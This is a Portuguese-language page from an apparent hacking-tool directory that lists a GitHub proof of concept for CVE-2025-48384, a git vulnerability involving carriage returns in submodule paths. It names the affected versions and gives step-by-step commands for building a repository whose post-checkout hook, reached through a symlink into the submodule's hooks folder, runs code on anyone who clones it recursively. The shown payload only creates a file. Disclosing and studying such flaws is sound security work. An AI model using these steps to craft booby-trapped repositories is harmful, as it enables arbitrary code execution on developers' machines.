Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-48384-poc — PoC para CVE-2025-48384 | Kitploit
Ferramentas/GitHubGitHub/jacobholtz/cve-2025-48384-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebPapers e PesquisaAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubjacobholtz/cve-2025-48384-poc

CVE-2025-48384-poc

PoC para CVE-2025-48384

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-48384-poc

CVE-2025-48384 assume a forma de uma vulnerabilidade de resolução de link inadequada (link following) no git. Especificamente, nomes de arquivo com retornos de carro são analisados incorretamente em .git/config, e incluir um link simbólico que aponte para um executável de hook git localizado em um submódulo como o diretório de hooks do submódulo pode levar à execução arbitrária de código quando o repositório é clonado com git clone --recursive.

O Git para Microsoft Windows não é afetado por esta vulnerabilidade, deixando principalmente versões específicas do git no Linux e MacOS vulneráveis. As versões afetadas são:

  • v2.50.0
  • v2.49.0
  • v2.48.0-v2.48.1
  • v2.47.0–v2.47.2
  • v2.46.0–v2.46.3
  • v2.45.0-v2.45.3
  • v2.44.0–v2.44.3
  • v2.43.6 e anteriores

Passos para reproduzir a prova de conceito:

  1. Crie dois repositórios, poc e submodule
  2. No submodule, crie um hook git post-checkout para executar código quando o repositório poc for clonado recursivamente:
root@kitploit:~
#!/bin/bash
touch ~/hackedlol
  1. No poc, adicione o repositório submodule com git submodule add https://github.com/<your submodule repo>.git sub
Baixar ferramenta
  • Adicione um retorno de carro à nova pasta sub criada com git mv sub $(printf "sub\r")
  • Execute echo printf "\tpath = \"sub\r\"\n" para .gitmodules e remova o caminho original.
  • Crie um link simbólico para a pasta de hooks no diretório .git local com ln -s .git/modules/sub/hooks sub
  • Adicione tudo ao repositório
  • Com sorte, funciona lol
  • Fontes

    • https://dgl.cx/2025/07/git-clone-submodule-cve-2025-48384
    • https://github.com/git/git/commit/05e9cd64ee23bbadcea6bcffd6660ed02b8eab89#diff-8fbc2654131392c3018ecfc92462057b3bdc675cc674084c248bb0393a46b59f